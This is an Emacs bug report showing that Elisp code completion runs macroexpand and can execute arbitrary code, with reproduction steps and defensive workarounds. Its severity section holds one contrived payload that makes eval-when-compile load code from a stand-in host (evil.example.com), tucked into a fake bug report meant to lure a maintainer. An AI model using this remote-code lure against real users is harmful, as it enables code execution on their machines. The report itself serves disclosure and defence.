bug#32495: 26.1; Arbitrary code execution when completing inside untrusted elisp code

[Wilfred Hughes]

elisp-completion-at-point calls macroexpand, which may execute arbitrary code.

REPRODUCING

1. Insert this code in a buffer in emacs-lisp-mode.

(let ((foo (eval-when-compile (debug))))
  x)

2. Put point on x.

3. Press C-M-i, or M-x elisp-completion-at-point.

4. Observe that the debugger is opened, because code is being executed!

SEVERITY

I don't know whether Emacs considers calling code-completion on
untrusted code to be a concern or not. A contrived example might look
like a bug report containing the following:

(let ((foo (eval-when-compile (eval "/ftp:evil.example.com:exploit.el")))
      ;; ... lots of code
      (bar 1))
  ;; Dear maintainer, I've found a bug in your completion. Please try
  ;; completion in the following:
  abc
  )

This could also cause accidental issues, as I might edit code that has
some unwanted side-effects inside eval-when-compile blocks. However,
this functionality has existed since 2013 (added in commit
bbcc4d97447a by Stefan) and no-one has noticed so far.

WORKAROUNDS

When calling macroexpand or macroexpand-all, either:

1. pass in an environment with all untrusted macros replaced with dummies:


(let ((macro-whitelist '(when pcase))
      all-macros
      safe-env)
  (mapatoms
   (lambda (sym)
     (when (macrop sym)
       (push sym all-macros))))
  (mapc
   (lambda (sym)
     (unless (memq sym macro-whitelist)
       (push (cons sym (symbol-function 'ignore))
             safe-env)))
   all-macros)

  (macroexpand-all
   arbitrary-form-here
   safe-env))

2. bind all eval-capable functions first (INCOMPLETE, there are other
eval-capable functions, such as load):

(cl-letf (((symbol-function 'eval) #'ignore)
          ((symbol-function 'eval-region) #'ignore)
          ((symbol-function 'eval-buffer) #'ignore)
          ((symbol-function 'backtrace-eval) #'ignore))
  (macroexpand-all some-arbitrary-form-here))